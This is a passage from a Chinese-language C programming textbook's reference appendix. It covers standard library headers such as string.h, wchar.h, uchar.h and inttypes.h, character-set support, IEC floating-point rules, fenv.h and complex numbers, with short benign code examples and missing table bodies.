stdnoreturn.h定义了noreturn宏,该宏展开为_Noreturn。 B.5.22 处理字符串:string.h string.h库定义了size_t类型和空指针要使用的NULL宏。string.h头文件提 供了一些分析和操控字符串的函数,其中一些函数以更通用的方式处理内 存。表B.5.37列出了这些函数。 表B.5.37 字符串函数 1583 续表 1584 strtok()函数的用法有点不寻常,下面演示一个简短的示例。 1585 #include <stdio.h> #include <string.h> int main(void) { char data[] = " C is\t too#much\nfun!"; const char tokseps[] = " \t\n#";/* 分隔符 */ char * pt; puts(data); pt = strtok(data,tokseps);   /* 首次调用 */ while (pt)            /* 如果pt是NULL,则退出 */ { puts (pt);          /* 显示记号 */ pt = strtok(NULL, tokseps);/* 下一个记号 */ } return 0; } 下面是该示例的输出: C is too#much fun! 1586 C is too much fun! B.5.23 通用类型数学:tgmath.h(C99) math.h和complex.h库中有许多类型不同但功能相似的函数。例如,下面6 个都是计算正弦的函数: double sin(double); float sinf(float); long double sinl(long double); double complex csin(double complex); float csinf(float complex); long double csinl(long double complex); tgmath.h 头文件定义了展开为通用调用的宏,即根据指定的参数类型调 用合适的函数。下面的代码演示了使用sin()宏时,展开为正弦函数的不同形 式: #include <tgmath.h> ... 
double dx, dy; 1587 float fx, fy; long double complex clx, cly; dy = sin(dx);          // 展开为dy = sin(dx) (函数) fy = sin(fx);          // 展开为fy = sinf(fx) cly = sin(clx);         // 展开为cly = csinl(clyx) tgmath.h头文件为3类函数定义了通用宏。第1类由math.h和complex.h中定 义的6个函数的变式组成,用l和f后缀和c前缀,如前面的sin()函数所示。在 这种情况下,通用宏名与该函数double类型版本的函数名相同。 第2类由math.h头文件中定义的3个函数变式组成,使用l和f后缀,没有 对应的复数函数(如,erf())。在这种情况下,宏名与没有后缀的函数名相 同,如erf()。使用带复数参数的这种宏的效果是未定义的。 第3类由complex.h头文件中定义的3个函数变式组成,使用l和f后缀,没 有对应的实数函数,如cimag()。使用带实数参数的这种宏的效果是未定义 的。 表B.5.38列出了一些通用宏函数。 表B.5.38 通用数学函数 在C11以前,编写实现必须依赖扩展标准才能实现通用宏。但是使用 1588 C11新增的_Generic表达式可以直接实现。 B.5.24 线程:threads.h(C11) threads.h和stdatomic.h头文件支持并发编程。这方面的内容超出了本书 讨论的范围,简而言之,该头文件支持程序执行多线程,原则上可以把多个 线程分配给多个处理器处理。 B.5.25 日期和时间:time.h time.h定义了3个宏。第1个宏是表示空指针的NULL,许多其他头文件中 也定义了这个宏。第2个宏是CLOCKS_PER_SEC,该宏除以clock()的返回值 得以秒为单位的时间值。第3个宏(C11)是TIME_UTC,这是一个正整型常 量,用于指定协调世界时 [1](即UTC)。该宏是timespec_get()函数的一个 可选参数。 UTC是目前主要世界时间标准,作为互联网和万维网的普通标准,广泛 应用于航空、天气预报、同步计算机时钟等各领域。 time.h头文件中定义的类型列在表B.5.39中。 表B.5.39 time.h中定义的类型 timespec结构中至少有两个成员,如表B.5.40所列。 表B.5.40 timespec结构中的成员 1589 日历类型的各组成部分被称为分解时间(broken-down time)。表B.5.41 列出了struct tm结构中所需的成员。 表B.5.41 struct tm结构中的成员 日历时间(calendar time)表示当前的日期和时间,例如,可以是从 1900年的第1秒开始经过的秒数。本地时间(local time)指的是本地时区的 日历时间。表B.5.42列出了一些时间函数。 表B.5.42 时 间 函 数 续表 1590 表B.5.43列出了strftime()函数中使用的转换说明。其中许多替换的值 (如,月份名)都取决于当前的本地化设置。 表B.5.43 strftime()函数中使用的转换说明 1591 续表 1592 B.5.26 统一码工具:uchar.h(C11) C99 的 wchar.h 头文件提供两种途径支持大型字符集。C11 专门针对统 一码(Unicode)新增了适用于UTF-16和UTF-32编码的类型(见表 B.5.44)。 表B.5.44 uchar.h中声明的类型 该头文件中还声明了一些多字节字符串与char16_t、char32_t格式相互转 换的函数(见表B.5.45)。 表B.5.45 宽字符与多字节转换函数 1593 续表 B.5.27 扩展的多字节字符和宽字符工具:wchar.h(C99) 每种实现都有一个基本字符集,要求C的char类型足够宽,以便能处理 这个字符集。实现还要支持扩展的字符集,这些字符集中的字符可能需要多 字节来表示。可以把多字节字符与单字节字符一起储存在普通的 char 类型 数组,用特定的字节值指定多字节字符本身及其大小。如何解释多字节字符 取决于移位状态(shift state)。在最初的移位状态中,单字节字符保留其通 常的解释。特殊的多字节字符可以改变移位状态。除非显式改变特定的移位 状态,否则移位状态一直保持有效。 wchar_t类型提供另一种表示扩展字符的方法,该类型足够宽,可以表 示扩展字符集中任何成员的编码。用这种宽字符类型来表示字符时,可以把 单字符储存在wchar_t类型的变量中,把宽字符的字符串储存在wchar_t类型 的数组中。字符的宽字符表示和多字节字符表示不必相同,因为后者可能使 用前者并不使用的移位状态。 wchar.h 头文件提供了一些工具用于处理扩展字符的两种表示法。该头 文件中定义的类型列在表B.5.46中(其中有些类型也定义在其他的头文件 中)。 表B.5.46 wchar.h中定义的类型 1594 wchar.h头文件中还定义了一些宏,如表B.5.47所列。 表B.5.47 wchar.h中定义的宏 该库提供的输入/输出函数类似于stdio.h中的标准输入/输出函数。在标 准I/O函数返回EOF的情况中,对应的宽字符函数返回WEOF。表B.5.48中列 出了这些函数。 表B.5.48 宽字符I/O函数 1595 有一个宽字符I/O函数没有对应的标准I/O函数: int fwide(FILE *stream, int mode)[2]; 如果mode为正,函数先尝试把形参表示的流指定为宽字符定向(wide- charaacter oriented);如果 mode为负,函数先尝试把流指定为字节定向 (byte oriented);如果 mode为0,函数则不改变流的定向。该函数只有在 流最初无定向时才改变其定向。在以上所有的情况中,如果流是宽字符定 向,函数返回正值;如果流是字节定向,函数返回负值;如果流没有定向, 函数则返回0。 wchar.h 头文件参照 string.h,也提供了一些转换和控制字符串的函数。 一般而言,用 wcs 代替sting.h中的str标识符,这样wcstod()就是strtod()函数 的宽字符版本。表B.5.49列出了这些函数。 1596 表B.5.49 宽字符字符串工具 续表 该头文件还参照time.h头文件中的strtime()函数,声明了一个时间函数: size_t wcsftime(wchar_t * restrict s, size_t maxsize,const wchar_t * restrict format, 1597 const struct tm * restrict timeptr); 除此之外,该头文件还声明了一些用于宽字符字符串和多字节字符相互 转换的函数,如表B.5.50所列。 表B.5.50 宽字节和多字节字符转换函数 续表 1598 B.5.28 宽字符分类和映射工具:wctype.h(C99) wctype.h 库提供了一些与 ctype.h 中的字符函数类似的宽字符函数,以 及其他函数。wctype.h还定义了表B.5.51中列出的3种类型和宏。 表B.5.51 wctpe.h中定义的类型和宏 1599 在该库中,如果宽字符参数满足字符分类函数的条件时,函数返回真 (非0)。一般而言,因为单字节字符对应宽字符,所以如果 ctype.h 中对应 的函数返回真,宽字符函数也返回真。表 B.5.52 列出了这些函数。 表B.5.52 宽字节分类函数 该库还包含两个可扩展的分类函数,因为它们使用当前本地化的 LC_CTYPE值进行分类。表B.5.53列出了这些函数。 表B.5.53 可扩展的宽字符分类函数 1600 wctype()函数的有效参数名即是宽字符分类函数名去掉 isw 前缀。例 如,wctype("alpha")表示的是 iswalpha()函数判断的字符类别。因此,调用 iswctype(wc, wctype("alpha"))相当于调用iswalpha(wc),唯一的区别是前者使 用LC_CTYPE类别进行分类。 该库还有4个与转换相关的函数。其中有两个函数分别与ctype.h库中 toupper()和tolower()相对应。第3个函数是一个可扩展的版本,通过本地化的 
LC_CTYPE设置确定字符是大写还是小写。第4个函数为第3个函数提供合适 的分类参数。表B.5.54列出了这些函数。 表B.5.54 宽字符转换函数 1601 B.6 参考资料VI:扩展的整数类型 第3章介绍过,C99的inttypes.h头文件为不同的整数类型提供一套系统的 别名。这些名称与标准名称相比,能更清楚地描述类型的性质。例如,int类 型可能是16位、32位或64位,但是int32_t类型一定是32位。 更精确地说,inttypes.h头文件定义的一些宏可用于scanf()和printf()函数 中读写这些类型的整数。inttypes.h头文件包含的stdlib.h头文件提供实际的类 型定义。格式化宏可以与其他字符串拼接起来形成合适格式化的字符串。 该头文件中的类型都使用typedef定义。例如,32位系统的int可能使用这 样的定义: typedef int int32_t; 用#define指令定义转换说明。例如,使用之前定义的int32_t的系统可以 这样定义: #define PRId32 "d" // 输出说明符 #define SCNd32 "d" // 输入说明符 使用这些定义,可以声明扩展的整型变量、输入一个值和显示该值: int32_t cd_sales; // 32位整数类型 scanf("%" SCNd32, &cd_sales); printf("CD sales = %10" PRId32 " units\n", cd_sales); 如果需要,可以把字符串拼接起得到最终的格式字符串。因此,上面的 代码可以这样写: int cd_sales; // 32位整数类型 1602 scanf("%d", &cd_sales); printf("CD sales = %10d units\n", cd_sales); 如果把原始代码移植到16位int的系统中,该系统可能把int32_t定义为 long,把PRId32定义为"ld"。但是,仍可以使用相同的代码,只要知道系统 使用的是32位整型即可。 该参考资料的其余部分列出了扩展类型、转换说明以及表示类型限制的 宏。 B.6.1 精确宽度类型 typedef标识了一组精确宽度的类型,通用形式是intN_t(有符号类型) 和uintN_t(无符号类型),其中N表示位数(即类型的宽度)。但是要注 意,不是所有的系统都支持所有的这些类型。例如,最小可用内存大小是16 位的系统就不支持int8_t和uint8_t类型。格式宏可以使用d或i表示有符号类 型,所以PRIi8和SCNi8都有效。对于无符号类型,可以使用o、x或u以获 得%o、%x或%X转换说明来代替%u。例如,可以使用PRIX32以十六进制格 式打印uint32_t类型的值。表B.6.1列出了精确宽度类型、格式说明符和最小 值、最大值。 表B.6.1 精确宽度类型 B.6.2 最小宽度类型 1603 最小宽度类型保证一种类型的大小至少是某位。这些类型一定存在。例 如,不支持 8 位单元的系统可以把int_least_8定义为16位类型。表B.6.2列出 了最小宽度类型、格式说明符和最小值、最大值。 表B.6.2 最小宽度类型 B.6.3 最快最小宽度类型 对于特定的系统,用特定的整型更快。例如,在某些实现中 int_least16_t可能是short,但是系统在进行算术运算时用int类型会更快些。 因此,inttypes.h还定义了表示为某位数的最快类型。这些类型一定存在。在 某些情况下,可能并未明确指定哪种类型最快,此时系统会简单地选择其中 的一种。表B.6.3列出了最快最小宽度类型、格式说明符和最小值、最大 值。 表B.6.3 最快最小宽度类型 B.6.4 最大宽度类型 1604 有些情况下要使用最大整数类型,表B.6.4列出了这些类型。实际上, 由于系统可能会提供比所需类型更大宽度的类型,因此这些类型的宽度可能 比long long或unsigned long long更大。 表B.6.4 最大宽度类型 B.6.5 可储存指针值的整型 inttypes.h头文件(通过包含stdint.h即可包含该头文件)定义了两种整数 类型,可精确地储存指针值,见表B.6.5。 表B.6.5 可储存指针值的整数类型 B.6.6 扩展的整型常量 在整数后面加上L后缀可表示long类型的常量,如445566L。如何表示 int32_t类型的常量?要使用inttypes.h头文件中定义的宏。例如,表达式 INT32_C(445566)展开为一个int32_t类型的常量。从本质上看,这种宏相当 于把当前类型强制转换成底层类型,即特殊实现中表示int32_t类型的基本类 型。 宏名是把相应类型名中的_C 用_t 替换,再把名称中所有的字母大写。 例如,要把 1000 设置为unit_least64_t类型的常量,可以使用表达式 UNIT_LEAST64_C(1000)。 1605 B.7 参考资料VII:扩展字符支持 C 语言最初并不是作为国际编程语言设计的,其字符的选择或多或少是 基于标准的美国键盘。但是,随着后来C在世界范围内越来越流行,不得不 扩展来支持不同且更大的字符集。这部分参考资料概括介绍了一些相关内 容。 B.7.1 三字符序列 有些键盘没有C中使用的所有符号,因此C提供了一些由三个字符组成 的序列(即三字符序列)作为这些符号的替换表示。如表B.7.1所示。 表B.7.1 三字符序列 C替换了源代码文件中的这些三字符序列,即使它们在双引号中也是如 此。因此,下面的代码: ??=include <stdio.h> ??=define LIM 100 int main() ??< int q??(LIM??); printf("More to come.??/n"); ... 1606 ??> 会变成这样: #include <stdio.h> #define LIM 100 int main() { int q[LIM]; printf("More to come.\n"); ... } 当然,要在编译器中设置相关选项才能激活这个特性。 B.7.2 双字符 意识到三字符系统很笨拙,C99提供了双字符(digraph),可以使用它 们来替换某些标准C标点符号。 表B.7.2 双字符 与三字符不同的是,不会替换双引号中的双字符。因此,下面的代码: %:include <stdio.h> %:define LIM 100 1607 int main() <% int q<:LIM:>; printf("More to come.:>"); ... %> 会变成这样: #include <stdio.h> #define LIM 100 int main() { int q[LIM]; printf("More to come.:>"); // :>是字符串的一部分 ... 
}                // :>与 }相同 B.7.3 可选拼写:iso646.h 使用三字符序列可以把||运算符写成??!??!,这看上去比较混乱。C99 通 过iso646.h头文件(参考资料V中的表B.5.11)提供了可展开为运算符的宏。 C标准把这些宏称为可选拼写(alternative spelling)。 如果包含了iso646.h头文件,以下代码: 1608 if(x == M1 or x == M2) x and_eq 0XFF; 可展开为下面的代码: if(x == M1 || x == M2) x &= 0XFF; B.7.4 多字节字符 C 标准把多字节字符描述为一个或多个字节的序列,表示源环境或执行 环境中的扩展字符集成员。源环境指的是编写源代码的环境,执行环境指的 是用户运行已编译程序的环境。这两个环境不同。例如,可以在一个环境中 开发程序,在另一个环境中运行该程序。扩展字符集是C语言所需的基本字 符集的超集。 有些实现会提供扩展字符集,方便用户通过键盘输入与基本字符集不对 应的字符。这些字符可用于字符串字面量和字符常量中,也可出现在文件 中。有些实现会提供与基本字符集等效的多字节字符,可替换三字符和双字 符。 例如,德国的一个实现也许会允许用户在字符串中使用日耳曼元音变音 字符: puts("eins zwei drei vier fünf"); 一般而言,程序可使用的扩展字符集因本地化设置而异。 B.7.5 通用字符名(UCN) 多字节字符可以用在字符串中,但是不能用在标识符中。C99新增了通 用字符名(UCN),允许用户在标识名中使用扩展字符集中的字符。系统扩 展了转义序列的概念,允许编码ISO/IEC 10646标准中的字符。该标准由国 1609 际标准化组织(ISO)和国际电工技术委员会(IEC)共同制定,为大量的 字符提供数值码。10646标准和统一码(Unicode)关系密切。 有两种形式的UCN序列。第1种形式是\u hexquard,其中hexquard是一个 4位的十六进制数序列(如,\u00F6)。第 2种形式是\U hexquardhexquard, 如\U0000AC01。因为十六进制每一位上的数对应4位,\u形式可用于16位整 数表示的编码,\U形式可用于32位整数表示的编码。 如果系统实现了UCN,而且包含了扩展字符集中所需的字符,就可以在 字符串、字符常量和标识符中使用UCN: wchar_t value\u00F6\u00F8 = L'\u00f6'; 统一码和ISO 10646 统一码为表示不同的字符集提供了一种解决方案,可以根据类型为大量 字符和符号制定标准的编号系统。例如,ASCII码被合并为统一码的子集, 因此美国拉丁字符(如A~Z)在这两个系统中的编码相同。但是,统一码 还合并了其他拉丁字符(如,欧洲语言中使用的一些字符)和其他语言中的 字符,包括希腊文、西里尔字母、希伯来文、切罗基文、阿拉伯文、泰文、 孟加拉文和形意文字(如中文和日文)。到目前为止,统一码表示的符号超 过了 110000个,而且仍在发展中。欲了解更多细节,请查阅统一码联合站 点:www.unicode.org。 统一码为每个字符分配一个数字,这个数字称为代码点(code point)。典型的统一码代码点类似:U-222B。U表示该字符是统一字符, 222B是表示该字符的一个十六进制数,在这种情况下,表示积分号。 国际标准化组织(ISO)组建了一个团队开发ISO 10646和标准编码的多 语言文本。ISO 10646团队和统一码团队从1991年开始合作,一直保持两个 标准的相互协调。 B.7.6 宽字符 1610 C99为使用宽字符提供更多支持,通过wchar.h和wctype.h库包含了更多 大型字符集。这两个头文件把wchar_t定义为一种整型类型,其确切的类型 依赖实现。该类型用于储存扩展字符集中的字符,扩展字符集是是基本字符 集的超集。根据定义,char类型足够处理基本字符集,而wchar_t类型则需要 更多位才能储存更大范围的编码值。例如,char 可能是 8 位字节,wchar_t 可能是 16 位的 unsigned short。 用L前缀标识宽字符常量和字符串字面量,用%lc和%ls显示宽字符数 据: wchar_t wch = L'I'; wchar_t w_arr[20] = L"am wide!"; printf("%lc %ls\n", wch, w_arr); 例如,如果把wchar_t实现为2字节单元,'I'的1字节编码应储存在wch的 低位字节。不是标准字符集中的字符可能需要两个字节储存字符编码。例 如,可以使用通用字符编码表示超出 char 类型范围的字符编码: wchar_t w = L'\u00E2'; /* 16位编码值 */ 内含 wchar_t 类型值的数组可用于储存宽字符串,每个元素储存一个宽 字符编码。编码值为 0 的wchar_t值是空字符的wchar_t类型等价字符。该字 符被称为空宽字符(null wide character),用于表示宽字符串的结尾。 可以使用%lc和%ls读取宽字符: wchar_t wch1; wchar_t w_arr[20]; puts("Enter your grade:"); scanf("%lc", &wch1); 1611 puts("Enter your first name:"); scanf("%ls",w_arr); wchar_t头文件为宽字符提供更多支持,特别是提供了宽字符I/O函数、 宽字符转换函数和宽字符串控制函数。例如,可以用fwprintf()和wprintf()函 数输出,用fwscanf()和wscanf()函数输入。与一般输入/输出函数的主要区别 是,这些函数需要宽字符格式字符串,处理的是宽字符输入/输出流。例 如,下面的代码把信息作为宽字符显示: wchar_t * pw = L"Points to a wide-character string"; int dozen = 12; wprintf(L"Item %d: %ls\n", dozen, pw); 类似地,还有getwchar()、putwchar()、fgetws()和fputws()函数。wchar_t 头文件定义了一个WEOF宏,与EOF在面向字节的I/O中起的作用相同。该宏 要求其值是一个与任何有效字符都不对应的值。因为wchar_t类型的值都有 可能是有效字符,所以wchar_t库定义了一个wint_t类型,包含了所有wchar_t 类型的值和WEOF的值。 该库中还有与string.h库等价的函数。例如,wcscpy(ws1, ws2)把ws1指 定的宽字符串拷贝到ws2指向的宽字符数组中。类似地,wcscmp()函数比较 宽字符串,等等。 wctype.h头文件新增了字符分类函数,例如,如果iswdigit()函数的宽字 符参数是数字,则返回真;如果iswblank()函数的参数是空白,则返回真。 空白的标准值是空格和水平制表符,分别写作L''和L'\t'。 C11标准通过uchar.h头文件为宽字符提供更多支持,为匹配两种常用的 统一码格式,定义了两个新类型。第1种类型是char16_t,可储存一个16位编 码,是可用的最小无符号整数类型,用于hexquard UCN形式和统一码UTF-16 编码方案。 1612 char16_t = '\u00F6'; 第2种类型是char32_t,可储存一个32位编码,最小的可用无符号整数类 型,。可用于hexquard UCN形式和统一码UTF-32编码方案 char32_t = '\U0000AC01'; 前缀u和U分别表示char16_t和char32_t字符串。 char16_t ws16[11] = u"Tannh\u00E4user"; char32_t ws32[13] = U"caf\U000000E9 au lait"; 注意,这两种类型比wchar_t类型更具体。例如,在一个系统中, wchar_t可以储存32位编码,但是在另一个系统中也许只能储存16位的编 码。另外,这两种新类型都与C++兼容。 B.7.7 宽字符和多字节字符 宽字符和多字节字符是处理扩展字符集的两种不同的方法。例如,多字 节字符可能是一个字节、两个字节、三个字节或更多字节,而所有的宽字符 
都只有一个宽度。多字节字符可能使用移位状态(移位状态是一个字节,确 定如何解释后续字节);而宽字符没有移位状态。可以把多字节字符的文件 读入使用标准输入函数的普通char类型数组,把宽字节的文件读入使用宽字 符输入函数的宽字节数组。 C99 在wchar.h库中提供了一些函数,用于多字节和宽字节之间的转换。 mbrtowc()函数把多字节字符转换为宽字符,wcrtomb()函数把宽字符转换为 多字节字符。类似地,mbstrtowcs()函数把多字节字符串转换为宽字节字符 串,wcstrtombs()函数把宽字节字符串转换为多字节字符串。 C11在uchar.h库中提供了一些函数,用于多字节和char16_t之间的转换, 以及多字节和char32_t之间的转换。 1613 B.8 参考资料VIII:C99/C11数值计算增强 过去,FORTRAN是数值科学计算和工程计算的首选语言。C90使C的计 算方法更接近于FORTRAN。例如,float.h中使用的浮点特性规范都是基于 FORTRAN标准委员会开发的模型。C99和C11标准继续增强了C的计算能 力。例如,C99新增的变长数组(C11成为可选的特性),比传统的C数组更 符合FORTRAN的用法(如果实现不支持变长数组,C11指定了 __STDC_NO_VLA__宏的值为1)。 B.8.1 IEC浮点标准 国际电工技术委员会(IEC)已经发布了一套浮点计算的标准(IEC 60559)。该标 准包括了浮点数的格式、精度、NaN、无穷值、舍入规则、 转换、异常以及推荐的函数和算法等。C99纳入了该标准,将其作为C实现 浮点计算的指导标准。C99新增的大部分浮点工具(如,fenv.h头文件和一些 新的数学函数)都基于此。另外,float.h头文件定义了一些与IEC浮点模型 相关的宏。 1.浮点模型 下面简要介绍一下浮点模型。标准把浮点数x看作是一个基数的某次幂 乘以一个分数,而不是C语言的E记数法(例如,可以把876.54写成 0.87654E3)。正式的浮点表示更为复杂: 简单地说,这种表示法把一个数表示为有效数(significand)与b的e次 幂的乘积。 下面是各部分的含义。 s代表符号(±1)。 1614 b代表基数。最常见的值是2,因为浮点处理器通常使用二进制数学。 e代表整数指数(不要与自然对数中使用的数值常量e混淆),限制最小 值和最大值。这些值依赖于留出储存指数的位数。 fk代表基数为b时可能的数字。例如,基数为2时,可能的数字是0和1; 在十六进制中,可能的数字是0~F。 p代表精度,基数为b时,表示有效数的位数。其值受限于预留储存有效 数字的位数。 明白这种表示法的关键是理解float.h和fenv.h的内容。下面,举两个例子 解释内部如何表示浮点数。 首先,假设一个浮点数的基数b为10,精度p为5。那么,根据上面的表 示法,24.51应写成: (+1)103(2/10 + 4/100 + 5/1000 + 1/10000 + 0/100000) 假设计算机可储存十进制数(0~9),那么可以储存符号、指数3和5个 fk值:2、4、5、1、0(这里,f1是2,f2是4,等等)。因此,有效数是 0.24510,乘以103得24.51。 接下来,假设符号为正,基数b是2,p是7(即,用7位二进制数表 示),指数是5,待储存的有效数是1011001。下面,根据上面的公式构造该 数: x = (+1)25(1/2 +0/4 + 1/8 + 1/16 + 0/32 + 0/64 + 1/128) = 32(1/2 +0/4 + 1/8 + 1/16 + 0/32 + 0/64 + 1/128) = 16 + 0 + 4 + 2 +0 + 0 + 1/4 = 22.25 float.h中的许多宏都与该浮点表示相关。例如,对于一个float类型的 1615 值,表示基数的FLT_RADIX是b,表示有效数位数(基数为b时)的 FLT_MANT_DIG是p。 2.正常值和低于正常的值 正常浮点值(normalized floating-point value)的概念非常重要,下面简 要介绍一下。为简单起见,先假设系统使用十进制(b = FLT_RADIX = 10) 和浮点值的精度为 5(p = FLT_MANT_DIG = 5)(标准要求的精度更高)。 考虑下面表示31.841的方式: 指数 = 3,有效数 = .31841(.31841E3) 指数 = 4,有效数 = .03184(.03184E4) 指数 = 5,有效数 = .00318(.00318E5) 显而易见,第1种方法精度最高,因为在有效数中使用了所有的5位可用 位。规范化浮点非零值是第1位有效位为非零的值,这也是通常储存浮点数 的方式。 现在,假设最小指数(FLT_MIN_EXP)是-10,那么最小的规范值是: 指数 = -10,有效数 = .10000(.10000E-10) 通常,乘以或除以10意味着使指数增大或减小,但是在这种情况下,如 果除以10,却无法再减小指数。但是,可以改变有效数获得这种表示: 指数 = -10,有效数 = .01000(.01000E-10) 这个数被称为低于正常的(subnormal),因为该数并未使用有效数的 全精度。例如,0.12343E-10除以10得.01234E-10,损失了一位的信息。 对于这个特例,0.1000E-10 是最小的非零正常值(FLT_MIN),最小的 非零低于正常值是0.00001E-10(FLT_TRUE_MIN)。 1616 float.h中的宏FLT_HAS_SUBNURM、DBL_HAS_SUBNORM和 LDBL_HAS_SUBNORM表征实现如何处理低于正常的值。下面是这些宏可 能会用到的值及其含义: -1   不确定(尚未统一) 0    不存在(例如,实现可能会用0替换低于正常的值) 1    存在 math.h库提供一些方法,包括fpclassify()和isnormal()宏,可以识别程序 何时生成低于正常的值,这样会损失一些精度。 3.求值方案 float.h 中的宏 FLT_EVAL_METHOD 确定了实现采用何种浮点表达式的 求值方案,如下所示(有些实现还会提供其他负值选项)。 -1    不确定 0    对在所有浮点类型范围和精度内的操作、常量求值 1    对在 double 类型的精度内和 float、double 类型的范围内的操 作、常量求值,对 longdouble范围内的long double类型的操作、常量求值 2    对所有浮点类型范围内和long double类型精度内的操作和常 量求值 例如,假设程序中要把两个float类型的值相乘,并把乘积赋给第3个 float类型变量。对于选项1(即K&R C采用的方案),这两个float类型的值 将被扩展为double类型,使用double类型完成乘法计算,然后在赋值计算结 果时再把乘积转为float类型。 1617 如果选择0(即ANSI C采用的方案),实现将直接使用这两个float类型 的值相乘,然后赋值乘积。这样做比选项1快,但是会稍微损失一点精度。 4.舍入 float.h中的宏FLT_ROUNDS确定了系统如何处理舍入,其指定值所对应 的舍入方案如下所示。 -1   不确定 0    趋零截断 1    舍入到最接近的值 2    趋向正无穷 3    趋向负无穷 系统可以定义其他值,对应其他舍入方案。 一些系统提供控制舍入的方案,在这种情况下,fenv.h中的festround()函 数提供编程控制。 如果只是计算制作37个蛋糕需要多少面粉,这些不同的舍入方案可能并 不重要,但是对于金融和科学计算而言,这很重要。显然,把较高精度的浮 点值转换成较低精度值时需要使用舍入方案。例如,把double类型的计算结 果赋给float类型的变量。另外,在改变进制时,也会用到舍入方案。不同进 制下精确表示的分数不同。例如,考虑下面的代码: float x = 0.8; 在十进制下,8/10或4/5都可以精确表示0.8。但是大部分计算机系统都 以二进制储存结果,在二进制下,4/5表示为一个无限循环小数: 0.1100110011001100... 
1618 因此,在把0.8储存在x中时,将其舍入为一个近似值,其具体值取决于 使用的舍入方案。 尽管如此,有些实现可能不满足 IEC 60559 的要求。例如,底层硬件可 能无法满足要求。因此,C99定义了两个可用作预处理器指令的宏,检查实 现是否符合规范。第 1 个宏是_ _STDC_IEC_559_ _,如果实现遵循IEC 60559浮点规范,该宏被定义为常量1。第2个宏是_ _STDC_IEC_559_COMPLEX_ _,如果实现遵循IEC 60559兼容复数运算,该 宏被定义为常量1。 如果实现中未定义这两个宏,则不能保证遵循IEC 60559。 B.8.2 fenv.h头文件 fenv.h 头文件提供一些与浮点环境交互的方法。也就是说,允许用户设 置浮点控制模式值(该值管理如何执行浮点运算)并确定浮点状态标志(或 异常)的值(报告运算效果的信息)。例如,控制模式设置可指定舍入的方 案;如果运算出现浮点溢出则设置一个状态标志。设置状态标志的操作叫作 抛出异常。 状态标志和控制模式只有在硬件支持的前提下才能发挥作用。例如,如 果硬件没有这些选项,则无法更改舍入方案。 使用下面的编译指示开启支持: #pragma STDC FENV_ACCESS ON 这意味着程序到包含该编译指示的块末尾一直支持,或者如果该编译指 示是外部的,则支持到该文件或翻译单元的末尾。使用下面的编译指示关闭 支持: #pragma STDC FENV_ACCESS OFF 使用下面的编译指示可恢复编译器的默认设置,具体设置取决于实现: 1619 #pragma STDC FENV_ACCESS DEFAULT 如果涉及关键的浮点运算,这个功能非常重要。但是,一般用户使用的 程度有限,所以本附录不再深入讨论。 B.8.3 STDC FP_CONTRACT编译指示 一些浮点数处理器可以把有多个运算符的浮点表达式合并成一个运算。 例如,处理器只需一步就求出下面表达式的值: x*y - z 这加快了运算速度,但是减少了运算的可预测性。STDC FP_CONTRACT 编译指示允许用户开启或关闭这个特性。默认状态取决于 实现。 为特定运算关闭合并特性,然后再开启,可以这样做: #pragma STDC FP_CONTRACT OFF val = x * y - z; #pragma STDC FP_CONTRACT ON B.8.4 math.h库增补 大部分C90数学库中都声明了double类型参数和double类型返回值的函 数,例如: double sin(double); double sqrt(double); C99和C11库为所有这些函数都提供了float类型和long double类型的函 数。这些函数的名称由原来函数名加上f或l后缀构成,例如: 1620 float sinf(float);        /* sin()的float版本 */ long double sinl(long double);   /* sin()的long double版本 */ 有了这些不同精度的函数系列,用户可以根据具体情况选择最效率的类 型和函数组合。 C99还新增了一些科学、工程和数学运算中常用的函数。表B.5.16列出 了所有数学函数的double版本。在许多情况下,这些函数的返回值都可以使 用现有的函数计算得出,但是新函数计算得更快更精确。例如,loglp(x)表 示的值与与log(1 + x)相同,但是loglp(x)使用了不同的算法,对于较小的x值 而言计算更精确。因此,可以使用log()函数作普通运算,但是对于精确要求 较高且x值较小时,用loglp()函数更好。 除这些函数以外,数学库中还定义了一些常量和与数字分类、舍入相关 的函数。例如,可以把值分为无穷值、非数(NaN)、正常值、低于正常的 值、真零。[NaN是一个特别的值,用于表示一个不是数的值。例如, asin(2.0)返回NaN,因为定义了asin()函数的参数必须是-1~1范围内的值。 低于正常的值是比使用全精度表示的最小值还要小的数。]还有一些专用的 比较函数,如果一个或多个参数是非正常值时,函数的行为与标准的关系运 算符不同。 使用C99的分类方案可以检测计算的规律性。例如,math.h中的 isnormal()宏,如果其参数是一个正常的数,则返回真。下面的代码使用该 宏在num不正常时结束循环: #include <math.h>   // 为了使用isnormal() ... 
float num = 1.7e-19; float numprev = num; 1621 while (isnormal(num)) // 当num为全精度的float类型值 { numprev = num; num /= 13.7f; } 简而言之,数学库为更好地控制如何计算浮点数,提供了扩展支持。 B.8.5 对复数的支持 复数是有实部和虚部的数。实部是普通的实数,如浮点类型表示的数。 虚部表示一个虚数。虚数是-1的平方根的倍数。在数学中,复数通常写作类 似4.2 + 2.0i的形式,其中i表示-1的平方根。 C99支持3种复数类型(在C11中为可选): float _Complex double _Complex long double _Compplex 例如,储存float _Complex类型的值时,使用与两个float类型元素的数组 相同的内存布局,实部值储存在第1个元素中,虚部值储存在第2个元素中。 C99和C11还支持下面3种虚类型: float _Imaginary double _Imaginary long double _Imaginary 1622 包含了complex.h头文件,就可以用complex代替_Complex,用imaginary 代替_Imaginary。 为复数类型定义的算术运算遵循一般的数学规则。例如,(a+b*I)* (c+d*I)即是(a*c-b*d)+(b*c+a*d)*I。 complex.h头文件定义了一些宏和接受复数参数并返回复数的函数。特 别是,宏I表示-1的平方根。因此,可以编写这样的代码: double complex c1 = 4.2 + 2.0 * I; float imaginary c2= -3.0 * I; C11提供了另一种方法,通过CMPLX()宏给复数赋值。例如,如果re和 im都是double类型的值,可以这样做: double complex c3 = CMPLX(re, im); 这种方法的目的是,宏在处理不常见的情况(如,im是无穷大或非数) 时比直接赋值好。 complex.h头文件提供了一些复数函数的原型,其中许多复数函数都有 对应math.h中的函数,其函数名即是对应函数名前加上c前缀。例如,csin() 返回其复数参数的复正弦。其他函数与特定的复数特性相关。例如,creal() 函数返回一个复数的实部,cimag()函数返回一个复数的虚部。也就是说, 给定一个double conplex类型的z,下面的代码为真: z = creal(z) + cimag(z) * I; 如果熟悉复数,需要使用复数,请详细阅读complex.h中的内容。 下面的示例演示了对复数的一些支持: // complex.c -- 复数 1623 #include <stdio.h> #include <complex.h> void show_cmlx(complex double cv); int main(void) { complex double v1 = 4.0 + 3.0*I; double re, im; complex double v2; complex double sum, prod, conjug; printf("Enter the real part of a complex number: "); scanf("%lf", &re); printf("Enter the imaginary part of a complex number: "); 